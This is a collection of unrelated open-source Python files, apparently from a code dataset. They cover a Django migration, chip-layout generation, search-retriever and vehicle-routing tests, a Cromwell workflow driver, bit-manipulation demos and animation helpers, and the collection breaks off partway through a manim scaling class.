import awx.main.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0128_organiaztion_read_roles_ee_admin'),
]
operations = [
migrations.AddField(
model_name='unifiedjob',
name='installed_collections',
field=awx.main.fields.JSONBField(
blank=True, default=dict, editable=False, help_text='The Collections names and versions installed in the execution environment.'
),
),
]
|
utils/losses/__init__.py
|
ozcell/pytorch-auto-drive
| 292 |
78465
|
# Implementation based on pytorch 1.6.0
from .lane_seg_loss import *
from .hungarian_loss import *
|
compiler/pgates/pinvbuf.py
|
im-world/OpenRAM
| 335 |
78501
|
<reponame>im-world/OpenRAM<filename>compiler/pgates/pinvbuf.py
# See LICENSE for licensing information.
#
# Copyright (c) 2016-2021 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
import debug
import pgate
from vector import vector
from sram_factory import factory
from tech import layer
class pinvbuf(pgate.pgate):
"""
This is a simple inverter/buffer used for driving loads. It is
used in the column decoder for 1:2 decoding and as the clock buffer.
"""
def __init__(self, name, size=4, height=None):
debug.info(1, "creating pinvbuf {}".format(name))
self.add_comment("size: {}".format(size))
self.stage_effort = 4
self.row_height = height
# FIXME: Change the number of stages to support high drives.
# stage effort of 4 or less
# The pinvbuf has a FO of 2 for the first stage, so the second stage
# should be sized "half" to prevent loading of the first stage
self.size = size
self.predriver_size = max(int(self.size / (self.stage_effort / 2)), 1)
# Creates the netlist and layout
super().__init__(name)
def create_netlist(self):
self.add_pins()
self.add_modules()
self.create_insts()
def create_layout(self):
self.width = 2 * self.inv1.width + self.inv2.width
self.height = 2 * self.inv1.height
self.place_modules()
self.route_wires()
self.add_layout_pins()
self.add_boundary()
self.offset_all_coordinates()
def add_pins(self):
self.add_pin("A")
self.add_pin("Zb")
self.add_pin("Z")
self.add_pin("vdd")
self.add_pin("gnd")
def add_modules(self):
# Shield the cap, but have at least a stage effort of 4
input_size = max(1, int(self.predriver_size / self.stage_effort))
self.inv = factory.create(module_type="pinv",
size=input_size,
height=self.row_height)
self.add_mod(self.inv)
self.inv1 = factory.create(module_type="pinv",
size=self.predriver_size,
height=self.row_height)
self.add_mod(self.inv1)
self.inv2 = factory.create(module_type="pinv",
size=self.size,
height=self.row_height)
self.add_mod(self.inv2)
def create_insts(self):
# Create INV1 (capacitance shield)
self.inv1_inst = self.add_inst(name="buf_inv1",
mod=self.inv)
self.connect_inst(["A", "zb_int", "vdd", "gnd"])
self.inv2_inst = self.add_inst(name="buf_inv2",
mod=self.inv1)
self.connect_inst(["zb_int", "z_int", "vdd", "gnd"])
self.inv3_inst = self.add_inst(name="buf_inv3",
mod=self.inv2)
self.connect_inst(["z_int", "Zb", "vdd", "gnd"])
self.inv4_inst = self.add_inst(name="buf_inv4",
mod=self.inv2)
self.connect_inst(["zb_int", "Z", "vdd", "gnd"])
def place_modules(self):
# Add INV1 to the left (capacitance shield)
self.inv1_inst.place(vector(0, 0))
# Add INV2 to the right of INV1
self.inv2_inst.place(vector(self.inv1_inst.rx(), 0))
# Add INV3 to the right of INV2
self.inv3_inst.place(vector(self.inv2_inst.rx(), 0))
# Add INV4 flipped to the bottom aligned with INV2
self.inv4_inst.place(offset=vector(self.inv2_inst.rx(),
2 * self.inv2.height),
mirror="MX")
def route_wires(self):
if "li" in layer:
route_stack = self.li_stack
else:
route_stack = self.m1_stack
# inv1 Z to inv2 A
z1_pin = self.inv1_inst.get_pin("Z")
a2_pin = self.inv2_inst.get_pin("A")
mid_point = vector(z1_pin.cx(), a2_pin.cy())
self.add_path(z1_pin.layer, [z1_pin.center(), mid_point, a2_pin.center()])
self.add_via_stack_center(from_layer=z1_pin.layer,
to_layer=a2_pin.layer,
offset=a2_pin.center())
# inv2 Z to inv3 A
z2_pin = self.inv2_inst.get_pin("Z")
a3_pin = self.inv3_inst.get_pin("A")
mid_point = vector(z2_pin.cx(), a3_pin.cy())
self.add_path(z2_pin.layer, [z2_pin.center(), mid_point, a3_pin.center()])
self.add_via_stack_center(from_layer=z2_pin.layer,
to_layer=a3_pin.layer,
offset=a3_pin.center())
# inv1 Z to inv4 A (up and over)
z1_pin = self.inv1_inst.get_pin("Z")
a4_pin = self.inv4_inst.get_pin("A")
mid_point = vector(z1_pin.cx(), a4_pin.cy())
self.add_wire(route_stack,
[z1_pin.center(), mid_point, a4_pin.center()])
self.add_via_stack_center(from_layer=z1_pin.layer,
to_layer=route_stack[2],
offset=z1_pin.center())
def add_layout_pins(self):
# Continous vdd rail along with label.
vdd_pin = self.inv1_inst.get_pin("vdd")
self.add_layout_pin(text="vdd",
layer=vdd_pin.layer,
offset=vdd_pin.ll().scale(0, 1),
width=self.width,
height=vdd_pin.height())
# Continous vdd rail along with label.
gnd_pin = self.inv4_inst.get_pin("gnd")
self.add_layout_pin(text="gnd",
layer=gnd_pin.layer,
offset=gnd_pin.ll().scale(0, 1),
width=self.width,
height=gnd_pin.height())
# Continous gnd rail along with label.
gnd_pin = self.inv1_inst.get_pin("gnd")
self.add_layout_pin(text="gnd",
layer=gnd_pin.layer,
offset=gnd_pin.ll().scale(0, 1),
width=self.width,
height=vdd_pin.height())
z_pin = self.inv4_inst.get_pin("Z")
self.add_layout_pin_rect_center(text="Z",
layer=z_pin.layer,
offset=z_pin.center())
zb_pin = self.inv3_inst.get_pin("Z")
self.add_layout_pin_rect_center(text="Zb",
layer=zb_pin.layer,
offset=zb_pin.center())
a_pin = self.inv1_inst.get_pin("A")
self.add_layout_pin_rect_center(text="A",
layer=a_pin.layer,
offset=a_pin.center())
|
discovery-provider/src/utils/indexing_errors.py
|
Tenderize/audius-protocol
| 429 |
78509
|
class IndexingError(Exception):
"""Exception raised for errors in the indexing flow.
Attributes:
type -- One of 'user', 'user_replica_set', 'user_library', 'tracks', 'social_features', 'playlists'
blocknumber -- block number of error
blockhash -- block hash of error
txhash -- transaction hash of error
message -- error message
"""
def __init__(self, type, blocknumber, blockhash, txhash, message):
super().__init__(message)
self.type = type
self.blocknumber = blocknumber
self.blockhash = blockhash
self.txhash = txhash
self.message = message
|
cherche/retrieve/test_retrieve.py
|
raphaelsty/cherche
| 193 |
78510
|
<reponame>raphaelsty/cherche
import pytest
from .. import rank, retrieve
def cherche_retrievers(on: str, k: int = None):
"""List of retrievers available in cherche."""
yield from [
retrieve.TfIdf(key="title", on=on, documents=documents(), k=k),
retrieve.BM25Okapi(key="title", on=on, documents=documents(), k=k),
retrieve.BM25L(key="title", on=on, documents=documents(), k=k),
retrieve.Lunr(key="title", on=on, documents=documents(), k=k),
]
def documents():
return [
{"title": "Paris", "article": "This town is the capital of France", "author": "Wikipedia"},
{
"title": "Eiffel tower",
"article": "Eiffel tower is based in Paris",
"author": "Wikipedia",
},
{"title": "Montreal", "article": "Montreal is in Canada.", "author": "Wikipedia"},
]
@pytest.mark.parametrize(
"retriever, documents, k",
[
pytest.param(
retriever,
documents(),
k,
id=f"retriever: {retriever.__class__.__name__}, k: {k}",
)
for k in [None, 0, 2, 4]
for retriever in cherche_retrievers(on="article", k=k)
],
)
def test_retriever(retriever, documents: list, k: int):
"""Test retriever. Test if the number of retrieved documents is coherent.
Check for unknown tokens in the corpus, should returns an empty list.
"""
retriever = retriever + documents
retriever.add(documents)
# A single document contains town.
answers = retriever(q="town")
if k is None or k >= 1:
assert len(answers) == 1
else:
assert len(answers) == 0
for sample in answers:
for key in ["title", "article", "author"]:
assert key in sample
# Unknown token.
answers = retriever(q="Unknown")
assert len(answers) == 0
# All documents contains "Montreal Eiffel France"
answers = retriever(q="Montreal Eiffel France")
if k is None or k >= len(documents):
assert len(answers) == len(documents)
else:
assert len(answers) == k
@pytest.mark.parametrize(
"retriever, documents, k",
[
pytest.param(
retriever,
documents(),
k,
id=f"Multiple fields retriever: {retriever.__class__.__name__}, k: {k}",
)
for k in [None, 0, 2, 4]
for retriever in cherche_retrievers(on=["article", "title", "author"], k=k)
],
)
def test_fields_retriever(retriever, documents: list, k: int):
"""Test retriever when providing multiples fields."""
retriever = retriever + documents
# All documents have Wikipedia as author.
answers = retriever(q="Wikipedia")
if k is None or k >= len(documents):
assert len(answers) == len(documents)
else:
assert len(answers) == max(k, 0)
for sample in answers:
for key in ["title", "article", "author"]:
assert key in sample
# Unknown token.
answers = retriever(q="Unknown")
assert len(answers) == 0
# Two documents contains paris
answers = retriever(q="Paris")
if k is None or k >= 2:
assert len(answers) == 2
else:
assert len(answers) == max(k, 0)
@pytest.mark.parametrize(
"documents, k",
[
pytest.param(
documents(),
k,
id=f"retriever: Flash, k: {k}",
)
for k in [None, 0, 2, 4]
],
)
def test_flash(documents: list, k: int):
"""Test Flash retriever."""
# Reset retriever
retriever = retrieve.Flash(key="title", k=k, on="title") + documents
retriever.add(documents)
# A single document contains town.
answers = retriever(q="Paris")
if k is None or k >= 1:
assert len(answers) == 1
else:
assert len(answers) == 0
for sample in answers:
for key in ["title", "article", "author"]:
assert key in sample
# Unknown token.
answers = retriever(q="Unknown")
assert len(answers) == 0
# All documents contains is
answers = retriever(q="<NAME>")
if k is None or k >= len(documents):
assert len(answers) == len(documents)
else:
assert len(answers) == k
@pytest.mark.parametrize(
"documents, k",
[
pytest.param(
documents(),
k,
id=f"retriever: ElasticSearch, k: {k}",
)
for k in [None, 0, 2, 4]
],
)
def test_elastic(documents, k):
"""Test Elasticsearch if elastic server is running. Test elasticsearch as a retriever for a
single field and multiple fields. Test if storing"""
from elasticsearch import Elasticsearch
from sentence_transformers import SentenceTransformer
es = Elasticsearch()
if es.ping():
ranker = rank.Encoder(
key="title",
encoder=SentenceTransformer(
"sentence-transformers/all-mpnet-base-v2",
).encode,
on=["title", "article", "author"],
k=k,
)
retriever = retrieve.Elastic(key="title", on="article", k=k, es=es, index="test_cherche")
retriever.reset()
retriever.add(documents)
test_retriever(retriever=retriever, documents=documents, k=k)
retriever = retrieve.Elastic(
key="title", on=["title", "article", "author"], k=k, es=es, index="test_cherche"
)
retriever.reset()
retriever.add(documents)
test_fields_retriever(retriever, documents=documents, k=k)
# Store embeddings using Elasticsearch
retriever.reset()
retriever.add_embeddings(documents=documents, ranker=ranker)
pipeline = retriever + ranker
answers = pipeline("Paris")
if k is None or k >= 2:
assert len(answers) == 2
else:
assert len(answers) == max(k, 0)
|
src/mcedit2/synth/l_system_plugin.py
|
elcarrion06/mcedit2
| 673 |
78549
|
"""
l_system_plugin
"""
from __future__ import absolute_import, division, print_function
import logging
from mcedit2.editortools.generate import GeneratePlugin
from mcedit2.synth.l_system import renderBlocks, renderSceneNodes, applyReplacementsIterated
from mcedit2.util.showprogress import showProgress
from mcedit2.widgets.spinslider import SpinSlider
log = logging.getLogger(__name__)
class LSystemPlugin(GeneratePlugin):
"""
A GeneratePlugin subclass intended for driving an L-system.
Most of the GeneratePlugin methods are already implemented. To use an LSystemPlugin,
you need to implement `getOptionsWidget` and `createInitialSymbol` - after that,
previewing and generating the L-System is taken care of by LSystemPlugin.
In your implementation of `getOptionsWidget`, you should add `self.iterationsSlider`
to your widget to control the iteration depth.
A `recursive` attribute is also available. If your L-System is not recursively defined - that
is, a finite number of iterations will result in a symbol list that has no further `replace`
methods defined, you may set the `recursive` attribute of the LSystemPlugin to False. Setting
`recursive` to False will cause the block and schematic renderer to run the replacement rules
until no further replacements occur (or until MAX_ITERATIONS iterations), and the value of
`iterationsSlider` will be ignored for the final generation. The `iterationsSlider` will
still affect the GL rendering, which is useful for inspecting the system's state after every
iteration.
"""
recursive = True
MAX_ITERATIONS = 50
def __init__(self, editorSession):
super(LSystemPlugin, self).__init__(editorSession)
self.optionsWidget = None
self.iterationsSlider = SpinSlider()
self.iterationsSlider.setMinimum(1)
self.iterationsSlider.setMaximum(50)
self.iterationsSlider.setValue(3)
self.iterationsSlider.valueChanged.connect(self.updatePreview)
def createInitialSymbol(self, bounds):
"""
Create and return the initial Symbol for the L-System. The symbol is typically initialized
using values input by the user via the options widget.
:param bounds: The bounding box selected with the Generate tool, in world coordinates.
:type bounds: BoundingBox
:return: The initial Symbol for this L-System
:rtype: Symbol
"""
raise NotImplementedError
def createSymbolList(self, bounds, indefinite=False):
system = self.createInitialSymbol(bounds)
symbol_list = [system]
if indefinite:
max_iterations = self.MAX_ITERATIONS
else:
max_iterations = self.iterationsSlider.value()
def process(_symbol_list):
for iteration, _symbol_list in applyReplacementsIterated(_symbol_list, max_iterations):
yield iteration, max_iterations
yield _symbol_list
symbol_list = showProgress("Generating...", process(symbol_list), cancel=True)
if symbol_list is False:
return None
return symbol_list
def getPreviewNode(self, bounds):
symbol_list = self.createSymbolList(bounds)
if symbol_list is None:
return None
log.info("Rendering symbols to OpenGL")
sceneNodes = self.renderSceneNodes(symbol_list)
return sceneNodes
def renderSceneNodes(self, symbol_list):
return renderSceneNodes(symbol_list)
def generateInSchematic(self, dimension, originalBounds):
symbol_list = self.createSymbolList(originalBounds)
if symbol_list is None:
return None
log.info("Rendering symbols to blocks")
rendering = self.renderBlocks(symbol_list)
log.info("Editing %d blocks" % len(rendering))
for x, y, z, blockType in rendering:
x -= originalBounds.minx
y -= originalBounds.miny
z -= originalBounds.minz
dimension.setBlock(x, y, z, blockType)
def renderBlocks(self, symbol_list):
return renderBlocks(symbol_list)
|
runners/cromwell_on_google/wdl_runner/cromwell_driver.py
|
ffinfo/wdl
| 185 |
78551
|
#!/usr/bin/python
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
# cromwell_driver.py
#
# This script provides a library interface to Cromwell, namely:
# * Start the Cromwell server
# * Submit execution requests to Cromwell
# * Poll Cromwell for job status
import logging
import os
import subprocess
import time
import requests
import sys_util
class CromwellDriver(object):
def __init__(self, cromwell_conf, cromwell_jar):
self.cromwell_conf = cromwell_conf
self.cromwell_jar = cromwell_jar
self.cromwell_proc = None
def start(self):
"""Start the Cromwell service."""
if self.cromwell_proc:
logging.info("Request to start Cromwell: already running")
return
self.cromwell_proc = subprocess.Popen([
'java',
'-Dconfig.file=' + self.cromwell_conf,
'-Xmx4g',
'-jar', self.cromwell_jar,
'server'])
logging.info("Started Cromwell")
def fetch(self, wf_id=None, post=False, files=None, method=None):
url = 'http://localhost:8000/api/workflows/v1'
if wf_id is not None:
url = os.path.join(url, wf_id)
if method is not None:
url = os.path.join(url, method)
if post:
r = requests.post(url, files=files)
else:
r = requests.get(url)
return r.json()
def submit(self, wdl, workflow_inputs, workflow_options, sleep_time=15):
"""Post new job to the server and poll for completion."""
# Add required input files
with open(wdl, 'rb') as f:
wdl_source = f.read()
with open(workflow_inputs, 'rb') as f:
wf_inputs = f.read()
files = {
'wdlSource': wdl_source,
'workflowInputs': wf_inputs,
}
# Add workflow options if specified
if workflow_options:
with open(workflow_options, 'rb') as f:
wf_options = f.read()
files['workflowOptions'] = wf_options
# After Cromwell start, it may take a few seconds to be ready for requests.
# Poll up to a minute for successful connect and submit.
job = None
max_time_wait = 60
wait_interval = 5
time.sleep(wait_interval)
for attempt in range(max_time_wait/wait_interval):
try:
job = self.fetch(post=True, files=files)
break
except requests.exceptions.ConnectionError as e:
logging.info("Failed to connect to Cromwell (attempt %d): %s",
attempt + 1, e)
time.sleep(wait_interval)
if not job:
sys_util.exit_with_error(
"Failed to connect to Cromwell after {0} seconds".format(
max_time_wait))
if job['status'] != 'Submitted':
sys_util.exit_with_error(
"Job status from Cromwell was not 'Submitted', instead '{0}'".format(
job['status']))
# Job is running.
cromwell_id = job['id']
logging.info("Job submitted to Cromwell. job id: %s", cromwell_id)
# Poll Cromwell for job completion.
attempt = 0
max_failed_attempts = 3
while True:
time.sleep(sleep_time)
# Cromwell occassionally fails to respond to the status request.
# Only give up after 3 consecutive failed requests.
try:
status_json = self.fetch(wf_id=cromwell_id, method='status')
attempt = 0
except requests.exceptions.ConnectionError as e:
attempt += 1
logging.info("Error polling Cromwell job status (attempt %d): %s",
attempt, e)
if attempt >= max_failed_attempts:
sys_util.exit_with_error(
"Cromwell did not respond for %d consecutive requests" % attempt)
continue
status = status_json['status']
if status == 'Succeeded':
break
elif status == 'Submitted':
pass
elif status == 'Running':
pass
else:
sys_util.exit_with_error(
"Status of job is not Submitted, Running, or Succeeded: %s" % status)
logging.info("Cromwell job status: %s", status)
# Cromwell produces a list of outputs and full job details
outputs = self.fetch(wf_id=cromwell_id, method='outputs')
metadata = self.fetch(wf_id=cromwell_id, method='metadata')
return outputs, metadata
if __name__ == '__main__':
pass
|
ch2/lineards/bit_manipulation.py
|
lyskevin/cpbook-code
| 1,441 |
78553
|
<reponame>lyskevin/cpbook-code
import math
def isOn(S, j):
return (S & (1<<j))
def setBit(S, j):
return (S | (1<<j))
def clearBit(S, j):
return (S & (~(1<<j)))
def toggleBit(S, j):
return (S ^ (1<<j))
def lowBit(S):
return (S&(-S))
def setAll(n):
return ((1<<n)-1)
def modulo(S, N): # returns S % N, where N is a power of 2
return ((S) & (N-1))
def isPowerOfTwo(S):
return (not(S & (S - 1)))
def nearestPowerOfTwo(S):
return 1<<round(math.log2(S))
def turnOffLastBit(S):
return (S & (S - 1))
def turnOnLastZero(S):
return ((S) | (S + 1))
def turnOffLastConsecutiveBits(S):
return ((S) & (S + 1))
def turnOnLastConsecutiveZeroes(S):
return ((S) | (S-1))
def printSet(vS): # in binary representation
print("S = {} = {:b}".format(vS, vS))
def main():
print("1. Representation (all indexing are 0-based and counted from right)")
S = 34
printSet(S)
print()
print("2. Multiply S by 2, then divide S by 4 (2x2), then by 2")
S = 34
printSet(S)
S = S << 1
printSet(S)
S = S >> 2
printSet(S)
S = S >> 1
printSet(S)
print()
print("3. Set/turn on the 3-rd item of the set")
S = 34
printSet(S)
S = setBit(S, 3)
printSet(S)
print()
print("4. Check if the 3-rd and then 2-nd item of the set is on?")
S = 42
printSet(S)
T = isOn(S, 3)
print("T = {}, {}".format(T, "ON" if T else "OFF"))
T = isOn(S, 2)
print("T = {}, {}".format(T, "ON" if T else "OFF"))
print()
print("5. Clear/turn off the 1-st item of the set")
S = 42
printSet(S)
S = clearBit(S, 1)
printSet(S)
print()
print("6. Toggle the 2-nd item and then 3-rd item of the set")
S = 40
printSet(S)
S = toggleBit(S, 2)
printSet(S)
S = toggleBit(S, 3)
printSet(S)
print()
print("7. Check the first bit from right that is on")
S = 40
printSet(S)
T = lowBit(S)
print("T = {} (this is always a power of 2)".format(T))
S = 52
printSet(S)
T = lowBit(S)
print("T = {} (this is always a power of 2)".format(T))
print();
print("8. Turn on all bits in a set of size n = 6")
S = setAll(6)
printSet(S)
print()
print("9. Other tricks (not shown in the book)")
print("8 % 4 = {}".format(modulo(8, 4)))
print("7 % 4 = {}".format(modulo(7, 4)))
print("6 % 4 = {}".format(modulo(6, 4)))
print("5 % 4 = {}".format(modulo(5, 4)))
print("is {} power of two? {}".format(9, isPowerOfTwo(9)))
print("is {} power of two? {}".format(8, isPowerOfTwo(8)))
print("is {} power of two? {}".format(7, isPowerOfTwo(7)))
for i in range(1, 17):
print("Nearest power of two of {} is {}".format(i, nearestPowerOfTwo(i)))
print("S = {}, turn off last bit in S, S = {}".format(40, turnOffLastBit(40)))
print("S = {}, turn on last zero in S, S = {}".format(41, turnOnLastZero(41)))
print("S = {}, turn off last consecutive bits in S, S = {}".format(39, turnOffLastConsecutiveBits(39)))
print("S = {}, turn on last consecutive zeroes in S, S = {}".format(36, turnOnLastConsecutiveZeroes(36)))
main()
|
zella-graphics/arc-chord-pie/example-2.py
|
whitmans-max/python-examples
| 140 |
78581
|
<filename>zella-graphics/arc-chord-pie/example-2.py
from graphics import *
# --- constants ---
WIDTH = 300
HEIGHT = 300
# --- functions ---
def moves():
# move figure 1
s = win.itemcget(fig1, 'start')
win.itemconfig(fig1, start=float(s)+5)
# move figure 2
s = win.itemcget(fig2, 'start')
win.itemconfig(fig2, start=float(s)+5)
# move figure 3
s = win.itemcget(fig3, 'start')
win.itemconfig(fig3, start=float(s)+5)
# run again after 100ms (0.1s)
win.after(100, moves)
# --- main ----
win = GraphWin("Patch", WIDTH, HEIGHT)
bbox = (5, 5, WIDTH-5, HEIGHT-5)
fig1 = win.create_arc(bbox, fill="red", outline='green', width=3, start=0, extent=90, style='arc')
fig2 = win.create_arc(bbox, fill="red", outline='green', width=3, start=95, extent=90, style='chord')
fig3 = win.create_arc(bbox, fill="red", outline='green', width=3, start=190, extent=90, style='pieslice')
# run first time - to start animation
moves()
#win.getKey()
win.getMouse()
win.close()
|
tests/test_solution_op_3optstar.py
|
juicetinliu/VeRyPy
| 156 |
78588
|
<filename>tests/test_solution_op_3optstar.py
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 05 19:00:19 2018
@author: juherask
"""
# Written in Python 2.7, but try to maintain Python 3+ compatibility
from __future__ import print_function
from __future__ import division
import sys
import unittest
from time import time
import numpy as np
from local_search import LSOPT, do_local_search
from local_search.solution_operators import do_3optstar_move
from classic_heuristics.nearest_neighbor import nearest_neighbor_init
from cvrp_io import generate_CVRP
from cvrp_ops import check_solution_feasibility, calculate_objective
from util import sol2routes, routes2sol
from test_intra_route_local_search_operation import Test3Opt
PRINT_ONLY_FINAL_RESULT = True
def _intra_route_3optstar_call(sol, D, strategy=LSOPT.FIRST_ACCEPT):
return do_3optstar_move(sol, D, [1.0]*len(D), len(D), None, strategy)
class TestIntraRouteMoves3OptStarSolutionOperator(Test3Opt):
""" This tests all the move operators on a single route. The test reuses
the test_local_search_operation.Test3Opt unit test.
"""
def setUp(self):
super(TestIntraRouteMoves3OptStarSolutionOperator, self).setUp()
self.move_op = _intra_route_3optstar_call
#TODO: write this
#class TestInterRouteMoves3OptStarSolutionOperator(unittest.TestCase):
# e.g. 6 nodes on a circular formation, depot at the center but tad closer to one
def _strategy_to_str(strategy):
if LSOPT.FIRST_ACCEPT:
return "FIRST_ACCEPT"
elif LSOPT.BEST_ACCEPT:
return "BEST_ACCEPT"
else:
return "N/A"
class TestSmoke3OptStarSolutionOperator(unittest.TestCase):
def setUp(self):
self.D = np.array([[ 0, 195, 168, 293, 236, 276],
[195, 0, 223, 225, 226, 434],
[168, 223, 0, 158, 377, 236],
[293, 225, 158, 0, 440, 380],
[236, 226, 377, 440, 0, 507],
[276, 434, 236, 380, 507, 0]])
self.d = [0, 14, 1, 24, 50, 13]
self.C = 50
self.initial_sol=[0, 5, 3, 0, 4, 0, 1, 2, 0]
def test_smoke(self):
print("in", self.initial_sol)
smoke_sol = do_local_search([do_3optstar_move],
self.initial_sol,
self.D, self.d, self.C)
print("out", smoke_sol)
class TestRandomStressOn3OptStarSolutionOperator(unittest.TestCase):
# abuse class variable to repeat with different problem sizes
problem_size = 5
def setUp(self):
N = TestRandomStressOn3OptStarSolutionOperator.problem_size
problem = generate_CVRP(N, 50, 10, 5)
aN,pts,d,D,C = (problem.size, problem.coordinate_points,
problem.customer_demands, problem.distance_matrix,
problem.capacity_constraint)
pts = None
d = [int(dv) for dv in d]
D = D.astype(int)
problem = aN,pts,d,D,C
self.naive_sol = routes2sol( [[n] for n in range(1,aN+1)] )
self.nn_sol = nearest_neighbor_init(D, d, C)
self.L = max( calculate_objective(r,D) for r in sol2routes(self.nn_sol) )
self.N = aN
self.problem = (aN,pts,d,D,C)
def _improve_with_3opt_star(self, problem, solution, strategy):
if len(problem)==5:
N,pts,d,D,C = problem
L = None
else:
N,pts,d,D,C,L = problem
sol = list(solution)
if not PRINT_ONLY_FINAL_RESULT:
print("\nin", sol)
total_t = 0
while True:
start_t = time()
out_sol = do_3optstar_move(sol, D, d, C, L, strategy)
elapsed_t = time()-start_t
total_t+=elapsed_t
if not PRINT_ONLY_FINAL_RESULT:
print("elapsed %.2f s"%elapsed_t)
print("out (%s)\n"%_strategy_to_str(strategy))
if out_sol[1] == None:
print("no more improvements found")
if PRINT_ONLY_FINAL_RESULT:
print("final (%s)"%_strategy_to_str(strategy),
sol, calculate_objective(sol, D))
print("total elapsed %.2f s"%total_t)
break
if not PRINT_ONLY_FINAL_RESULT:
print(out_sol, calculate_objective(out_sol[0], D))
sol = out_sol[0]
self.assertTrue( all(check_solution_feasibility(sol, D, d, C, L)), "must be feasible")
def test_random_problems_with_C_constraints_first_accept_from_naive_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
self._improve_with_3opt_star(self.problem, self.naive_sol, strategy=LSOPT.FIRST_ACCEPT)
def test_random_problems_with_C_constraints_best_accept_from_naive_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
self._improve_with_3opt_star(self.problem, self.naive_sol, strategy=LSOPT.BEST_ACCEPT)
def test_random_problems_with_L_constraints_first_accept_from_naive_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
problem_with_L = tuple( list(self.problem)+[self.L] )
self._improve_with_3opt_star(problem_with_L, self.naive_sol, strategy=LSOPT.FIRST_ACCEPT)
def test_random_problems_with_L_constraints_best_accept_from_naive_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
problem_with_L = tuple( list(self.problem)+[self.L] )
self._improve_with_3opt_star(problem_with_L, self.naive_sol, strategy=LSOPT.BEST_ACCEPT)
def test_random_problems_with_C_constraints_first_accept_from_nn_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
self._improve_with_3opt_star(self.problem, self.nn_sol, strategy=LSOPT.FIRST_ACCEPT)
def test_random_problems_with_C_constraints_best_accept_from_nn_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
self._improve_with_3opt_star(self.problem, self.nn_sol, strategy=LSOPT.BEST_ACCEPT)
def test_random_problems_with_L_constraints_first_accept_from_nn_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
problem_with_L = tuple( list(self.problem)+[self.L] )
self._improve_with_3opt_star(problem_with_L, self.nn_sol, strategy=LSOPT.FIRST_ACCEPT)
def test_random_problems_with_L_constraints_best_accept_from_nn_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
problem_with_L = tuple( list(self.problem)+[self.L] )
self._improve_with_3opt_star(problem_with_L, self.nn_sol, strategy=LSOPT.BEST_ACCEPT)
if __name__=="__main__":
unittest.main()
if len(sys.argv)<=1 or "TestRandomStressOn3OptStarSolutionOperator" in sys.argv:
#for N in range(70,101,10):
for N in range(5,15):
TestRandomStressOn3OptStarSolutionOperator.problem_size = N
wasSuccessful = unittest.main(exit=False, argv=["TestRandomStressOn3OptStarSolutionOperator"]).result.wasSuccessful()
if not wasSuccessful:
sys.exit(1)
|
code_video/autoscale.py
|
mrdon/code-video-generator
| 196 |
78604
|
from dataclasses import dataclass
from typing import Tuple
from manim import config
from manim import DEFAULT_MOBJECT_TO_EDGE_BUFFER
from manim import DEFAULT_MOBJECT_TO_MOBJECT_BUFFER
from manim import DOWN
from manim import LEFT
from manim import Mobject
from manim import np
from manim import ORIGIN
from manim import Polygon
from manim import RIGHT
from manim import UP
from wrapt import ObjectProxy
WIDTH_THIRD = (config["frame_x_radius"] * 2) / 3
@dataclass
class Bounds:
ul: Tuple[float, float, float] = None
ur: Tuple[float, float, float] = None
dr: Tuple[float, float, float] = None
dl: Tuple[float, float, float] = None
@property
def width(self):
return abs(self.ul[0] - self.ur[0])
@property
def height(self):
return abs(self.ur[1] - self.dr[1])
def as_mobject(self) -> Polygon:
return Polygon(self.ul, self.ur, self.dr, self.dl)
class AutoScaled(ObjectProxy):
"""
Autoscales whatever it wraps on changes in placement including:
* `next_to`
* `to_edge`
* `set_x`
* `set_y`
* `move_to`
"""
def __init__(self, delegate: Mobject, rescale: bool = True):
"""
Args:
delegate: The object to scale
rescale: Whether to rescale the object immediately or not
"""
super().__init__(delegate)
self._overall_scale_factor: float = 1
self._bounds = Bounds()
self.reset_bounds()
if rescale:
self.autoscale(ORIGIN)
def scale(self, scale_factor, **kwargs):
self._overall_scale_factor *= scale_factor
self.__wrapped__.scale(scale_factor, **kwargs)
return self
def copy(self):
result = self.__wrapped__.copy()
wrapper = AutoScaled(result, False)
wrapper._bounds = self._bounds
wrapper._overall_scale_factor = self._overall_scale_factor
return wrapper
def next_to(self, mobject_or_point, direction=RIGHT, **kwargs):
self.__wrapped__.next_to(mobject_or_point, direction, **kwargs)
self._update_bounds_to_direction(direction * -1)
self.autoscale(direction * -1)
return self
def move_to(self, point_or_mobject, aligned_edge=ORIGIN, coor_mask=np.array([1, 1, 1])):
self.__wrapped__.move_to(point_or_mobject, aligned_edge, coor_mask)
self._update_bounds_to_direction(aligned_edge)
self.autoscale(aligned_edge)
return self
def set_x(self, x, direction=ORIGIN):
self.__wrapped__.set_x(x, direction)
self._update_bounds_to_direction(direction)
self.autoscale(direction)
return self
def fill_between_x(self, x_left: float, x_right: float):
"""
Autoscales between two X values
"""
self._bounds.ur = np.array((x_right, self._bounds.ur[1], self._bounds.ur[2]))
self._bounds.dr = np.array((x_right, self._bounds.dr[1], self._bounds.dr[2]))
self.set_x(x_left, LEFT)
self._update_bounds_to_direction(LEFT)
self.autoscale(LEFT)
return self
def set_y(self, y, direction=ORIGIN):
self.__wrapped__.set_y(y)
self._update_bounds_to_direction(direction)
self.autoscale(direction)
return self
def full_size(self):
"""
Resets the scaling to full screen
"""
self.reset_bounds()
self.__wrapped__.center()
self.autoscale(ORIGIN)
return self
def reset_bounds(self):
x_rad = config["frame_x_radius"]
